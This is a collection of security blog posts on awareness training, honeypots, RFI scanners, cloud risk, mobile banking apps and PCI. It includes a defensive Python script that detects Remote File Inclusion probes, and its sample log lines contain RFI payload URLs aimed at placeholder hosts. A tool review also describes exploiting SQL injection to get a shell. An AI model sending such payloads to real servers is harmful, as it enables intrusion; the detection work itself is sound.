2 Ways to Get the Most Out of Security Awareness Training

A good security training and awareness program is one of, if not the most important part of any effective information security program. After all, people are the ones that cause security problems in the first place and, ultimately, people are the ones that have to deal with them. Not to mention the fact that people are twice as likely to detect security problems and breaches as any automated system. Doesn’t it make sense that you should do everything in your power to ensure that all of your people are behind you in your security efforts? That they are provided with the knowledge and the tools they need to understand information security and what their responsibilities are towards it? That they are aware of how devastating an information security incident can be to the company, and consequently, how devastating it can be to them personally? Well, you’re not going to get that from having them read the policy book as new hires and then hold a two hour class six or twelve months later!

And that is traditionally how information security is dealt with in most companies. All enthusiasm for the process is absent, too. They don’t want to do this training! It costs them time and money! The only reason most companies provide any security training outside of the very basics is because of their need to comply with some regulation or another. So what you end up with is a whole group of undertrained and unenthusiastic employees. And these employees become, in turn, the very kind of security liabilities that you are trying to avoid in the first place! So why not turn them into security assets instead? You have to provide them with some security training anyway, so why not give it that extra little “oomph” you need to make it worth your while to do?

How do you go about that, you may ask? Here are some tips:

1. Make sure that they understand what an information security incident or anomaly looks like. Make sure that they know all about social engineering techniques and how malware is spread. Give them some tips on how to recognize bogus websites, phishing emails and bogus phone calls. Let them know some of the things they can expect to see if there is a virus present on their machines. And don’t use just one format to provide them with this information. Use every method you can think of! There are many formats for security and awareness training to choose from: group assemblies with speakers and PowerPoint presentations, lunch and learns, training days, self-directed web-based learning, directed webinars, security documents, email reminders, posters and pamphlets, podcasts, departmental meetings, discussion groups and many more. And make sure that management personnel, especially top management personnel, make it clear how important this task is and how much it means to them and the company. Without this support, your efforts will go nowhere.

2. Give your people incentives that make them want to participate in the information security program. One method is to simply ask for their help. Make sure your employees understand how important the participation of each and every one of them is to the effort. People often respond very favorably to such requests, whereas if they are simply told that they must do it, they are much more likely to be unconcerned and uncooperative. Another way is to provide them with rewards for active participation in the program. Put the names of employees who have reported security issues in a hat and have a monthly drawing for a prize or a day off. Give these people a free lunch. Give them the best parking spot in the lot for a month. I’m sure you can think of a dozen other ways to reward your employees for participating in the program. Or simply post the picture of the employee on a bulletin board or internal web page or recognize their accomplishments at group meetings. Everybody really likes to be recognized for doing a good job!

The whole idea is to turn your personnel into “net cops”. If you can do that, you can turn your own people into the best IDS system there is, and for a lot less money than you would spend on machines or hosted services…or for cleaning up a security incident!

Using Honeypots to Track Attackers: Eric Romang’s FileAve.com Report

One of MSI’s Twitter friends, Eric Romang, recently wrote a deep dive about PHP RFI attacks that used the fileave.com service. The write-up was based on a large set of honeypot data that dates back several years!

The data is interesting and compelling and goes a long way to show value derived from the use of honeypots to track attackers and reveal information and trends about their behaviors. Check out this article here.

We were quite impressed with the data visualizations and are excited to see the level of effort put forth. Thanks for the dedication and hard work! We hope that you, our readers, enjoy pointers to great data like this.

Have you seen or done other honeypot research or visualizations on your networks and threats? If you care to share tips, results or the like, drop us a line below in the comments or via Twitter (@lbhuston, @mrmaguire). We would love to hear more about them!

As always, thanks for reading!

An Explanation of Our HoneyPoint Internet Threat Monitoring Environment #HITME #security

One of the least understood parts of MicroSolved is how the HoneyPoint Internet Threat Monitoring Environment (#HITME) data is used to better protect our customers. The engineers have asked me to drop this line into the newsletter and give you a “bees knees” perspective of how it works! First, if you don’t know about the #HITME, it is a set of deployed HoneyPoints that gather real world, real time attacker data from around the Internet. The sensors gather attack sources, frequency, targeting information, vulnerability patterns, exploits, malware and other crucial event data for the technical team at MSI to analyze. You can even follow the real time updates of attacker IPs and target ports on Twitter by following @honeypoint or the #HITME hash tag. MSI licenses that data under Creative Commons, non-commercial for FREE as a public service to the security community.

That said, how does the #HITME help MSI better protect their customers? Well, first, it allows folks to use the #HITME feed of known attacker IPs in a blacklist to block known scanners at their borders. This prevents the scanning tools and malware probes from ever reaching you to start with. Next, the data from the #HITME is analyzed daily and the newest, bleeding edge attack signatures get added to the MSI assessment platform. That means that customers with ongoing assessments and vulnerability management services from MSI get continually tested against the most current forms of attack being used on the Internet. The #HITME data also gets updated into the MSI pen-testing and risk assessment methodologies, focusing our testing on real world attack patterns much more than vendors who rely on typical scanning tools and back-dated threats from their last “yearly bootcamp”.

The #HITME data even flows back to the software vendors through a variety of means. MSI shares new attacks and possible vulnerabilities with the vendors, plus, open source projects targeted by attackers. Often MSI teaches those developers about the vulnerability, the possibilities for mitigation, and how to perform secure coding techniques like proper input validation. The data from the #HITME is used to provide the attack metrics and pattern information that MSI presents in its public speaking, “State of the Threat,” the blog, and other educational efforts. Lastly, but certainly not least, MSI provides an ongoing alerting function for organizations whose machines are compromised. MSI contacts critical infrastructure organizations whose machines turn up in the #HITME data and works with them to mitigate the compromise and manage the threat. These data-centric services are provided, pro-bono, in 99% of all of the cases!

If your organization would be interested in donating an Internet facing system to the #HITME project to further these goals, please contact your account executive. Our hope is that the next time you hear about the #HITME, you’ll get a smile on your face knowing that the members of my hive are working hard day and night to protect MSI customers and the world at large. You can count on us, we’ve got your back! 

Review of darkjumper v5.7

In continuing our research and experimentation with PHP and the threat of Remote File Inclusion (RFI), our team has been seeking out and testing various tools that have been made available to help identify web sites that are vulnerable to RFI during our penetration tests. Because we’re constantly finding more tools to add to the list, we’ve started the evaluation this week with the release of darkjumper v5.7. This Python tool prides itself on being cross-platform, and at first glance, seems rather easy to use. After downloading the tarball and extracting the files, simply calling the script from the command line brings it to life.

Running again with the --help or -h switches will print the options to the menu. This tool has several helpful options that could help expedite the discovery of various attack vectors against the web site. The injection switch incorporates a full barrage of SQLi and blind SQLi attempts against every web site identified on the target server. We did not use this option for this evaluation but intend to thoroughly test it in the future.

Using the inclusion switch will test for both local file inclusion (LFI) and RFI, again on every website identified on the target. This is our main focus for the evaluation since we’ve seen an incredible number of RFI attacks in the recent HITME data from around the globe. Selection of the full switch will attack the target server with the previously mentioned checks, in addition to scanning cgi directories, user enumeration, port scanning, header snatching, and several other possibly useful options. While a full review of this tool will be written eventually, we’re focusing on the RFI capabilities this time, so we’re using this test only against our test target. The test appears quite comprehensive. Another seemingly useful function of this tool is its ability to discover virtual hosts that live on the target server. After a short wait, darkjumper works its magic and spits out several files with various information for us to review. After poring through these files, our team was disappointed to realize that there were URLs that pointed to this server which seem to have been missed by the tool’s scans. Even more disappointing is the fact that of the 12 target sites identified by the tool, none were the target that we had suspected of being vulnerable to RFI.

File inclusion is a real threat in the wild today. We are seeing newly vulnerable and compromised hosts on a regular basis in the HITME data, and the fact that Apache ships with a default configuration that is vulnerable to these attacks, together with the fact that PHP is inherently insecure, makes the battle even more intense. It is absolutely critical in this environment that we harden our servers before bringing them online, and that those of us developing web applications validate every bit of information that is submitted to us by our users! Allowing our servers to execute code from an unknown source is one of the most popular attack vectors today, from SQL injection, to XSS and XSRF, to RFI. The Internet continues to be a digital equivalent to the wild, wild west, where outlaws abound. There is no guarantee that the users who interface with our sites are who they say they are or that they have the best of intentions. It is up to us to control how our applications and servers are handling this data.
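RFI probes of the kind seen in the HITME data leave a recognizable trace in web server access logs: a query parameter whose value is a remote URL. The following is an added example (not from the original post or any MSI tool) that flags such requests in Apache-style log lines and tallies the hosts serving the payloads; the sample lines, the `ignore_params` allow-list and all function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Common/combined log format: client IP, request line and status code.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Remote sources that PHP's include()/require() can fetch when URL
# includes are enabled on the server.
REMOTE_SOURCE_RE = re.compile(r'^(?:https?|ftps?)://', re.I)


def fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp -> %68ttp -> http)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_lines, ignore_params=frozenset()):
    """Return one finding per query parameter whose value is a remote URL.

    ignore_params is a hypothetical allow-list for parameters that
    legitimately carry URLs, such as a post-login redirect target.
    """
    findings = []
    for line in log_lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parseable access-log line
        path, _, query = match.group("target").partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            payload = fully_unquote(value).strip()
            if name in ignore_params or not REMOTE_SOURCE_RE.match(payload):
                continue
            findings.append({
                "ip": match.group("ip"),
                "path": path,
                "param": name,
                "payload": payload,
                # A 200 does not prove the include ran, but triage it first.
                "status": int(match.group("status")),
            })
    return findings


def payload_hosts(findings):
    """Count which hosts the payload files were served from."""
    hosts = Counter()
    for finding in findings:
        try:
            host = urlsplit(finding["payload"]).hostname
        except ValueError:  # malformed authority in the payload URL
            host = None
        hosts[host or "(none)"] += 1
    return hosts


# Constructed sample lines (documentation IP ranges and example domains).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jun/2010:10:01:22 +0000] "GET /index.php?page=http://files.example.net/id.txt? HTTP/1.1" 200 512',
    '198.51.100.23 - - [03/Jun/2010:10:02:10 +0000] "GET /view.php?inc=%2568ttp%3A%2F%2Ffiles.example.net%2Fid.txt%3F HTTP/1.1" 404 210',
    '192.0.2.44 - - [03/Jun/2010:10:03:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 1830',
    '192.0.2.44 - - [03/Jun/2010:10:03:05 +0000] "GET /login.php?next=https://www.example.org/home HTTP/1.1" 302 0',
    '203.0.113.7 - - [03/Jun/2010:10:04:41 +0000] "GET /news.php?id=1&tpl=ftp://drop.example.com/c.txt HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    hits = find_rfi_attempts(SAMPLE_LOG, ignore_params={"next"})
    for hit in hits:
        print(hit["ip"], hit["status"], hit["path"], hit["param"], hit["payload"])
    print(payload_hosts(hits).most_common())
```

Without the allow-list the legitimate `next=` redirect is also reported, which is why parameters that are meant to carry URLs have to be reviewed and excluded per application.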

How Cloud Computing Will Leak Into Your Enterprise

“Consumer use of the cloud,” in a phrase, is how the cloud will leak into your enterprise, whether you like it or not. Already, IT is struggling with how to manage the consumer use of devices and services in the enterprise. Skype/VoIP and WIFI were the warning shots, but the BlackBerry, iPhone, iPad and other consumer devices are the death knell for centralized IT (and IS) control.

Consumer electronics, backed by a wide array of free or low cost cloud services, are a new frontier for your organization. Services like MobileMe, Dropbox, various file sharing tools and remote access services like GoToMyPC, et al. have arrived. Likely, they are in use in your environment today. Consumers use and leverage these services as a part of their increasingly de-centralized online life. Even with sites like Twitter and Facebook growing in capability and attention, consumers grow their use, both personally and professionally, of services “in the cloud”. Make no mistake, despite your controls at the corporate firewalls, consumers are using their mobile and pocket devices and a variety of these services. Unless you are searching them at the door and blocking cell phone use in your business, they are there.

This might not be “the cloud” that your server admins are worrying about. It might not represent all of the off-site system, database and other hosting tools they are focused on right now, but make no mistake, this consumer version of the cloud has all, if not more, of the same issues and concerns. Questions about how your data is managed, secured and maintained all abound.

Given the “gadget posture” of most organizations and their user communities, this is not likely to be something that technical controls can adequately respond to. The consumer cloud services are too dynamic and widespread for black listing approaches to contain them. Plus, they obviously lack centralized choke points like in the old days of “network perimeter security”. The new solution, however, is familiar. Organizations must embrace policies and processes to cover these technologies and their issues. They also have to embrace education and awareness training around these topics with their user base. Those who think that denial and black listing can solve this problem are gravely mistaken. The backdoor cloud consumer movement into your organization is already present, strong and embedded. Teaching users to be focused on safe use of these services will hopefully reduce your risk, and theirs.

Three Tips for Banking App Dev for Mobile Devices

Lately, we have been looking at a lot of banking apps and front ends for the iPhone, Android and other mobile devices in the lab. Our testing thus far has shown some great results and it seems like a lot of banks, credit unions and other financial institutions are interested in having an “app” for their customers and members. Many of these apps are well designed, deep and rich. Many are simply canned front ends to existing web page content and functionality. A few are just plain horrible.

Here are three tips for organizations to keep in mind when coding their banking and financial apps for the mobile devices.

1. The mobile devices are not PCs. The apps should be lightweight, clean and easy to use. Usability is tied to security in this case, because of errors. If your app has tiny little buttons with confusing text, no confirmation dialogs and lacks other basic usability features then you make it easier for users to make mistakes, create bad transactions, get confused and other issues which could constitute a risk for your business and your users. Don’t design for a PC monitor. Make sure your designs are usable on the appropriate size screens and with appropriate space for human digits.

2. Don’t allow users to store their credentials in the app or its underlying data structures. Many mobile phones and such remain woefully unsecured. Even where the vendor has provided for basic security controls for the devices, many users do not use them. Plan ahead for this. The app has to be convenient, but it shouldn’t let the users place undue risk on themselves. If you allow them to store logins, or even a digital certificate, make sure they can’t also store at least 1-2 other pieces of credentials between uses. If someone just picks up their device, they should NOT have access to the user’s accounts.

3. This goes without saying, but don’t forget encryption. Just because an application uses the cell network, does not mean that you don’t need SSL. (I’m looking at you two developer groups in the last 90 days, you know who you are.) No matter the network, protect your transactions and data streams with strong crypto. The mobile devices can handle it. They can do enough lifting to handle SSL or they shouldn’t be running a banking app. Like Nike says, “Just Do It!”

There you have it. Three basic ways that you can help increase the safety and capability of your financial services app on the iPhone, iPad and other mobile platforms. If you have done these three basics, then you are off to a start. The next crucial step is to get your app and the back-end processes checked via a risk assessment and security test. Give us a call if you need assistance or want us to drop it into our testing lab process. We are seeing quite a few of them these days.

Piracy as a Crimeware Defense

So, just a quick thought on this one. What if we, as security folks, made a serious endeavor to reduce the earning capability of those who create crimeware, spyware and other malware? What if we did to them exactly what the gaming companies and MPAA have been saying is killing their business? What if every time we saw a piece of “licensed” crimeware tool, we cracked it and published keygens and other cracks for it?

Sure, in the mid-term there would be more attackers able to use the malware. But, what if, in the longer term, less malware were actually created? What if the bar went up to the point where publishing these tools was no longer profitable? Would the numbers and evolution of malware be slowed?

I am asking, not because I have an answer in mind, but because I am curious. At what point does striking at the root of the profitability of criminals reduce their efforts and capabilities? Anyone with ideas or experience in this line of thought, please leave a comment below. Thanks for reading and I look forward to your responses.

Fox Hypes Consumers on Cyber Security

This has to be one of the worst, most FUD-filled articles I have seen yet on cyber security.

http://www.foxnews.com/scitech/2010/06/03/ways-your-home-susceptible-hackers-cybersecurity/

In the article, many vulnerabilities and threats are discussed, but the article fails to lay out any sense of real risk based on probability or likely damages. In other words, here is a bunch of over-the-top crap to scare you about using technology.

I think this kind of stuff is exactly why consumers have grown palliative to security threats and keeping their machines patched. The media loves to whip the fear and hype on them routinely, yet common sense tells us innately that the sky can’t always be falling, or it would have fallen by now. Humans are incapable of existing at high levels of threat sensory overload for long periods of time. We just weren’t wired for it. Our sense of risk becomes irrational with too frequent and infrequent use.

Please, talk to people who ask about this stuff with a well-placed sense of risk. Explain that security issues exist in a variety of platforms, but the average person needs not fear every security problem. They need to base their decisions and actions on real world probability and damage calculations and NOT on hype by vendors, the media or interested parties.

I don’t know about you, but I’m not too worried about someone HERFing my stereo. It would work, likely, but the odds of someone caring enough to do it, having access and capability, seem pretty small. I’m not planning on tempesting the house any time soon, and neither should you.

What We Love About Netsparker

Netsparker Professional Edition, by Mavituna Security, is a web application scanner focused on finding unknown flaws in your applications. It can find a wide range of vulnerabilities including SQL injection, cross-site scripting, local and remote file inclusion, command injection and more.

Installation of the software was easy, and as Mavituna Security touts, the license is non-obtrusive. Starting the application, you are presented with a nice, well designed GUI that shows quite a lot of information. To start a scan, it can be as simple as just putting in a URL. It is very easy for non-security professionals to set up and use. There are also profiles you can configure and save. It’s possible to configure a form login through a very well designed wizard.

The main draw of Netsparker is the confirmation engine, which is how Netsparker claims to be false positive free. The confirmation engine takes the vulnerability and actually confirms that it’s exploitable. If it’s exploitable, it’s definitely not a false positive. A neat feature of identified SQL injection vulnerabilities is the ability for Netsparker to allow you to exploit them right through the scanner. You can run SQL queries, or even open a shell (depending on DB and configuration of it). Directory traversal vulnerabilities can be exploited to download the whole source of the application since Netsparker already knows all the files, and other system files can also be retrieved and saved through the interface.

We set Netsparker to scan our Web application lab which contains known vulnerabilities that cover the OWASP Top Ten Project. We noticed that Netsparker did a very good job at spidering and finding a high number of attack surfaces. On vulnerabilities, Netsparker did a great job of finding SQL injections, cross site scripting, and directory traversals. On one vulnerability, I thought I may have made Netsparker report a confirmed false positive, but it turns out I was wrong after I used the built in query maker and ran one and got data back.

Overall I think Netsparker is an excellent tool, especially effective at finding SQL injections and cross-site issues. Of course, I wouldn’t say it was the only scanner you should have, but definitely consider adding it to your repertoire.

The Media Makes PCI Compliance “Best Defense”?

I have seen a lot of hype in my day, but this one is pretty much — not funny. Below is a link to a mainstream media trade magazine for the hospitality industry in which the claim is made that PCI compliance is the “best defense” hotels and the like can have against attackers and data theft.

Link: http://is.gd/cgoTz

Now, I agree that hospitality folks should be PCI compliant, since they meet the requirements by taking credit cards, but setting PCI DSS as the goal is horrible enough. Making PCI out to be the “best defense” is pretty ridiculous.

PCI DSS and other standards are called security BASELINES for a reason. That is, they are the base of a good security program. They are the MINIMUM set of practices deemed to be acceptable to protect information. However, there is, in most all cases, a severe gap between the minimum requirements for protecting data and what I would quantify as the “best defense”. There are so many gaps between PCI DSS as a baseline and “best defense” that it would take pages and pages to enumerate. As an initial stab, just consider these items from our 80/20 approach to infosec left out of PCI: Formalized risk assessment (unless you count the SAQ or the work of the QSA), data flow modeling for data other than credit card information, threat modeling, egress controls, awareness, incident response team formation and even skills gap/training for your security team.

My main problem with PCI is not the DSS itself, but how it is quickly becoming the goal for organizations instead of the starting line. When you set minimums and enforce them with a hammer, they quickly come to be viewed as the be-all, end-all of the process and the point at which the pain goes away so you can focus on other things. This is a very dangerous position, indeed. Partial security is very costly and, at least in my opinion, doing the minimum is pretty far away from being the “best defense”.